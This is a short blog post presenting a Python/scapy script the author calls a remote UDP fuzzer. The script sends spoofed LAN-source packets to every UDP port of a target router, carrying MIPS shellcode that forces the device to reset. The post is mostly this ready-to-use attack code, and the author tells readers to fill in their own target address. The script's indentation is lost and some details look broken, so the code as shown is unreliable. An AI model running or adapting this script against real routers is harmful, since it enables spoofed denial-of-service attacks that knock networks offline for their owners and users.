Remote UDP Fuzzer
http://down--tech.blogspot.com/2015/01/remote-udp-fuzzer.html
Alot of administrators neglect to filter LAN traffic from a WAN interface. I made a script that can access UDP ports on a router that spoofs the src ip address. This tricks the router into thinking that the packet comes from the LAN side of the network so it should be able to access the UDP ports. I included an example buffer overflow script which has a MIPs based reset router shellcode.
Code :-
Code :-
#!/usr/bin/env python2
#
# Remote UDP Mips Fuzzer - Reset device shellcode
#
# usage: Edit the rumf.py script and change the destination server (i.dst)
#
from scapy.all import *
print("Remote UDP Mips Fuzzer - Reset Shellcode")
for num in range(0,10):
data = "00" * int(str(num))
sc = "3c06432134c6fedc3c05281234a519693c04fee13484dead24020ff80101010c"
a = data+sc
for ip in range(0,255):
for port in range(0,65535):
i=IP()
i.dst="Change_This"
i.src="10.0"+"."+str(ip)+"."+str(ip)
udp=UDP()
udp.sport=int(str(port))
udp.dport=int(str(port))
sendp(i/udp/a)

